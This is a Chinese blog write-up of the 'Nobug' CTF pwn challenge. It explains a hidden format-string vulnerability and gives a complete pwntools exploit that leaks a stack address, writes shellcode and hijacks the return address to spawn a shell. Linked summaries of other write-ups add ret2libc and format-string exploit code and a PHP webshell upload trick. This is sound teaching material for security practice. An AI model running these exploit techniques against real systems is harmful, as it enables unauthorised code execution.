攻防世界PWN之Nobug题解

最新推荐文章于 2025-03-30 19:47:24 发布
原创 最新推荐文章于 2025-03-30 19:47:24 发布 · 1.4k 阅读 · 4 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#PWN #CTF #二进制漏洞 #缓冲区溢出 #逆向工程

Nobug

首先,检查一下程序的保护机制

PIE和NX没开,那么,我们可以轻松的布置shellcode到栈里或bss段或堆里,然后跳转。免去了泄露libc地址这些。

然后,我们用IDA分析一下

看似好像这里sprintf不存在漏洞,我们再看看其他函数

看见一个很复杂的函数,我们看看那个地址处是什么

是查表法,看起来像某种加密或解密算法,又由于不需要秘钥,我们推测可能是base64加密或解密,然后,我们测试一下。

我们输入明文,输出总是乱码,我们输入base64字符串,发现正常输出了解密后的内容,由此,我们知道了,这个函数的作用是解密base64字符串。

 

然后,我们继续找找,也没发现什么可疑的地方。再看看其他没有用到的函数

发现这里有一个格式化字符串漏洞的函数,但是似乎这个函数没有被调用,真的是这样吗?

对于sub_8048B76函数,IDA查看伪代码是这样的

我们再看看汇编代码

程序结尾,通过修改esp,决定了retn的返回地址,这类似于ROP技术的思想,由此看来,分析程序不能完全依靠IDA的为代码

分析完了,其实就是存在一个非栈上的格式化字符串漏洞。

我们通过%4$hhn来修改%12$处的数据为%13$的地址,然后通过%12$hhn来修改%13$处为shellcode的地址,然后就能getshell了。我们只需要覆盖低2字节就行了,因为前面是一样的。需要注意的是,这几个操作必须在一次完成。

我们需要泄露%4$处的数据,以计算出我们需要攻击的目标%13$的地址

  1. payload = base64.b64encode('%4$p')  
  2. sh.sendline(payload)  
  3. sh.recvuntil('0x')  
  4. #泄露我们需要修改的目标的地址  
  5. target_addr = int(sh.recvuntil('\n',drop = True),16) + 4  

接下来,就是一次性的修改,getshell。

综上,我们的exp脚本

  1. #coding:utf8  
  2. from pwn import *  
  3. import base64  
  4.   
  5. sh = remote('111.198.29.45',31218)  
  6. #sh = process('./pwnh40')  
  7. elf = ELF('./pwnh40')  
  8. #我们输入的shellcode解密后会被保存到这里  
  9. shellcode_addr = 0x804A0A0  
  10. #shellcode  
  11. shellcode = asm(shellcraft.i386.sh())  
  12.   
  13. payload = base64.b64encode('%4$p')  
  14. sh.sendline(payload)  
  15. sh.recvuntil('0x')  
  16. #泄露我们需要修改的目标的地址  
  17. target_addr = int(sh.recvuntil('\n',drop = True),16) + 4  
  18. print hex(target_addr)  
  19. #发送shellcode,同时,覆盖%12$处为target地址,同时将target处修改为shellcode_addr  
  20. payload = base64.b64encode(shellcode + '%' + str((target_addr & 0xFF) - len(shellcode)) + 'c%4$hhn%' + str((shellcode_addr & 0xFF) - (target_addr & 0xFF)) + 'c%12$hn')  
  21. #getshell  
  22. sh.sendline(payload)  
  23.   
  24. sh.interactive()  

本题告诉我们,分析程序时,不要完全依赖IDA的伪代码。同时,对于一些复杂的算法,可以推测并尝试一下,说不定就是呢。

攻防世界----bug
qq_44418229的博客
08-03 1361
攻防世界----bug 知识点1:逻辑漏洞--垂直越权 知识点2:文件上传---利用JavaScript执行php代码
攻防世界PWNpwn11题解
seaaseesa的博客
02-09 788
pwn11 首先,检查一下程序的保护机制 然后,我们用IDA分析一下 程序会把字符串里的I替换成you,导致strcpy后,s出现栈溢出,直接覆盖到后门函数地址即可 后门函数 综上,我们的exp脚本 #coding:utf8 from pwn import * sh = process('./pwn11') sh = remote('111.198.29.45',31...
[XCTF-pwn] 33_rctf-2015_nobug
weixin_52640415的博客
03-10 509
格式化字符串漏洞 snprintf 程序先读入串,再用snprintf输出,由于snprintf有长度限制,每次只能一位一位的改。 int sub_8048B76() { size_t v0; // eax const char *v1; // eax v0 = strlen(s); v1 = (const char *)sub_804869D(s, v0, 0); return snprintf(byte_804A8A0, 0x800u, "%s", v1); } 思路:
nobug
子木小乔
12-09 875
/* _ooOoo_ o8888888o 88" . "88 (| -_- |) O\ = /O ____/`---'\____ .' \\| |// `. / \\||| : |||// \ / _||||| -:- |||||- \ | | \\\ - /// | | | \_| ''\---/'' | | \ .-\__ `-` ___/-. / ___`. .' /--.--\ `. .
no bug, no job
日显辉扬
12-28 670
no bug, no job 很多程序员都说听过 实在道理,没有BUG,那要程序员干什么 程序员总会花掉60%的时间找BUG 我想没有人写程序不会有BUG,只是多少的问题 在我的项目组中,我统计过,BUG少的人,花在设计的时间多,BUG多的人花在设计的时间少 最后总的时间,也差不多,当然我们还是乐意选BUG少的人来做工作    BUG总是改不完 特别是到项目结束,BUG越改越多
RCTF-2015 nobug
doudoudedi
06-07 787
思路 有一个格式化字符串的漏洞 int sub_8048B32() { int v0; // eax const char *v1; // eax v0 = strlen(s); v1 = sub_804869D(s, v0, 0); return snprintf(byte_804A8A0, 0x800u, v1); } 题目没有开nx我们可以直接布置好shellcode然后跳过去观察栈发现一个地方可以利用 .text:08048BD7 sub
攻防世界 pwn-100
2401_85052854的博客
03-29 463
一开始我是用cyclic来查看泄露到ret的偏移量的,所以没仔细看c代码,发现我没有后面的payload.ljust()还一直显示让我输入字符,把我看蒙了,仔细看了伪代码才发现在for中一定要输入完200个字节才会退出循环。最后发现可以用来溢出攻击的就只有在40063d函数中,审计代码可以发现a1是通过传入参数v3而来的,所以read是往v3里面输入数据,v3覆盖到返回地址为0x48。
攻防世界 pwn1
2401_85052854的博客
03-30 563
因为canary是通过逆字节存储,而且最后一个字节为\x00,由于puts遇到\x00会进行截断,所以我们用\n来进行覆盖,这里使用sendline所以自带\n不用自己加上去,因为是逆字节存储,所以是用rjust啊啊啊啊,死脑子快记住,因为没记住,在这里卡了好久,泄露完canary之后就是常规的泄露libc了,这里直接给出完整exp。一目了然,输入1就是read栈溢出,输入2就是把刚刚输入的进行打印,看看程序开了什么保护。
攻防世界PWN之easy_fmt题解
seaaseesa的博客
02-05 2948
Easyfmt 首先,检查一下程序的保护机制 然后,我们用IDA分析一下 存在一个明显的格式化字符串漏洞,但是只能用一次,后面exit(0)会结束程序 CheckIn需要爆破 是一个随机数,且只有一位,我们直接输入2,成功率1/10 为了不让程序退出,多次利用printf,我们就得利用第一次的printf把exit的got表内容修改为0x400982,这样,我们就能一直处于...
攻防世界PWN之cnss题解
seaaseesa的博客
02-14 951
Cnss 首先,我们检查一下程序的保护机制 然后,我们用IDA分析一下,发现是一个服务器程序,每接收到连接请求后就会fork一个子进程来处理。 代码太长,看似很复杂 我们发现eval函数存在栈溢出,并且由于没有开启PIE,那么我们只需要泄露了canary的值就能轻松ROP了。 关键是canary泄露不了。然而,我们可以一字节一字节的爆破它。我们知道,canary的值是随机...
在python中安装一个nobug模块,让你的程序不在有bug
乐亦亦乐的博客
12-16 1670
哈哈,其实并不是让你的程序真的没有bug。 创建一个文件命名为nobug.py nobug.py def a(): print(""" MMMMMMM .MMMMMMMMH ...
攻防世界 BUG 题 WP
qq_43622442的博客
03-06 576
攻防世界 BUG 题 WP 1.打开链接,只是一个简单的登录框: 2.测试弱口令和万能密码失败,尝试二次注入,发现单引号被转义了: 3.那我先用自己创建的号进去看一下有些什么: 4.这个manage需要管理员才能点,然后看到personal那里可以看一些个人信息,还有个uid,看看有没有越权,然而并没有= = 5.突然想起来超级好用的找回密码功能我还没测试= =先用自己创建的号跑一遍流程,发...
攻防世界 Bug
CyhDl666的博客
02-24 1280
进入界面随便注册一个root账号 点击Manage 页面返回Sorry,You are not admin! 需要用 admin账号 注册发现该账号已经被注册过了 发现有一个Findpwd界面 可以重置密码 问题来了 我不知道admin账号的生日和地址 先尝试一下改自己前面申请的root账号 改一下密码试试 这里要一直抓包 改掉username为admin尝试了一下 依然是成功的 所以这里admin的账号的密码就被改了 用admin登录 进入manage界面有提示IP NOT allowed burp.
攻防世界bug
weixin_54638628的博客
08-07 696
eval($_POST['a’])
攻防世界】bug
wangzhemvp的博客
04-14 738
抓包修改后缀为 “php5”,Content-Type 为 “image/jpeg”,并在 post 数据中将 PHP 一句话木马改为用 JavaScript 表示。4. 利用JavaScript执行php代码(正常的php代码会被检测到,所以就用JavaScript来执行)在muma.php里写一句话木马,发现系统能认出这是php文件,说明开启了内容的检测(存在。3. 等价替换(php5,php3)Content-Type 判断。文件内容过滤 PHP 的语法。
攻防世界Web-bug
九尾ww的博客
11-17 766
最后构造/index.php?这部分表示有一个动作需要执行,但是具体的操作(?返回首页修改密码,之后以管理员的身份进去,点击manage。抓包的user值就是UID:用户名的md5加密的编码。点击Manage时要求admin用户。利用改包把user改成admin。创建成功,会给一个UID=5。还要把url上的UID改为1。1:admin的md5值为。试一下发现是upload。上传之后修改一下文件类型。存在逻辑漏洞,成功越权。
[学习笔记]攻防世界-bug
qq_58742026的博客
03-23 867
逻辑漏洞,文件上传
[wp]攻防世界-bug
MercyLin的博客
09-07 1512
注册完账号登陆 点击Manage: 接下来想办法能不能把admin账号给他搞了: 找回用户需要输入生日以及地址emmm, 发现cookie里面有个参数user,看起来像md5,先尝试跑一下,不过原先的用户名可能太长了,user的值应该是和用户名有关的,这里我们重新注册了一个名为a的用户,尝试md5解密 解密的结果是6:a,6是a的uid,于是得出user是uid:用户名的md5,之前我验证...
攻防世界-WEB进阶区-bug
qq_64966153的博客
07-04 1233
攻防世界 bug靶场
攻防世界pwn
最新发布
11-16
攻防世界平台中部分pwn题目及解题方法如下: - **签到题**:这是一道简单的题目,无需额外操作,直接可获得shell并拿到flag。使用Python的`pwn`库编写代码,通过`remote`函数连接到指定的IP和端口,使用`interactive`函数与目标交互,最后关闭连接。示例代码如下: ```python from pwn import * r = remote("111.198.29.45", 59457) r.interactive() r.close() ``` [^1] - **利用printf返回字符个数特性的题目**:思路是利用`printf`返回字符个数的特性,把`pwnme`改成8。构造的`payload`包含`pwnme`的地址、填充字符和格式化字符串`%10$n`。通过`remote`函数连接目标,依次接收提示信息并发送相应内容,最后使用`interactive`函数与目标交互。示例代码如下: ```python from pwn import * pwnme_addr = 0x804A068 payload = p32(pwnme_addr) + 'a'*4 + '%10$n' r = remote('111.200.241.244', 55843) r.recvuntil('name:') r.sendline('233') r.recvuntil('please:') r.sendline(payload) r.interactive() ``` [^2] - **[GFSJ0469] string题目**:解题过程中使用IDA工具分析程序,将其插在第13行和第14行中间,获取`v4[0]`和`v4[1]`的地址,IDA吸收字符形成剑纹辅助解题 [^3]。 - **pwn - 200题目**: - **leak基本构造思路**:构造`leak`函数,其基本构造为112个`A`加上`write_plt`、漏洞存在函数的地址、`write`的第一个参数、`leak`函数的参数(给`DyELF`使用)和`write`的参数(打印8位地址使用)。通过`send`函数发送`payload`,接收数据并返回。使用`DynELF`查找`system`函数地址。示例代码如下: ```python def leak(address): payload = 'A'*junk + p32(write_plt) + p32(func_addr) + p32(1) + p32(address) + p32(4) r.send(payload) data = r.recv(4) print(data) return data dyn = DynELF(leak, elf=ELF('./pwn200')) sys_addr = dyn.lookup('system', libc) print('system address:', hex(sys_addr)) ``` [^4] - **leek出write地址返回main的解题方法**:先leek出`write`地址,返回`main`,计算偏移找到`system`和`/bin/sh`的位置以获得shell。使用`pwn`和`LibcSearcher`库,通过`remote`函数连接目标,构造不同的`payload`发送,接收数据并进行相应处理。示例代码如下: ```python from pwn import * from LibcSearcher import * p = remote("111.200.241.244", 33327) elf = ELF('./pwn') write_got = elf.got['write'] write_plt = elf.plt['write'] main_addr = 0x080484BE payload = 'a' * (0x6c + 0x4) + p32(write_plt) + p32(main_addr) + p32(1) + p32(write_got) + p32(8) p.recvline() p.sendline(payload) write_addr = u32(p.recv(4)) libc = LibcSearcher('write', write_addr) libc_base = write_addr - libc.dump('write') system_addr = libc_base + libc.dump('system') binsh = libc_base + libc.dump('str_bin_sh') payload = 'a' * (0x6c + 0x4) + p32(system_addr) + 'junk' + p32(binsh) p.sendline(payload) p.interactive() ``` [^5]
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值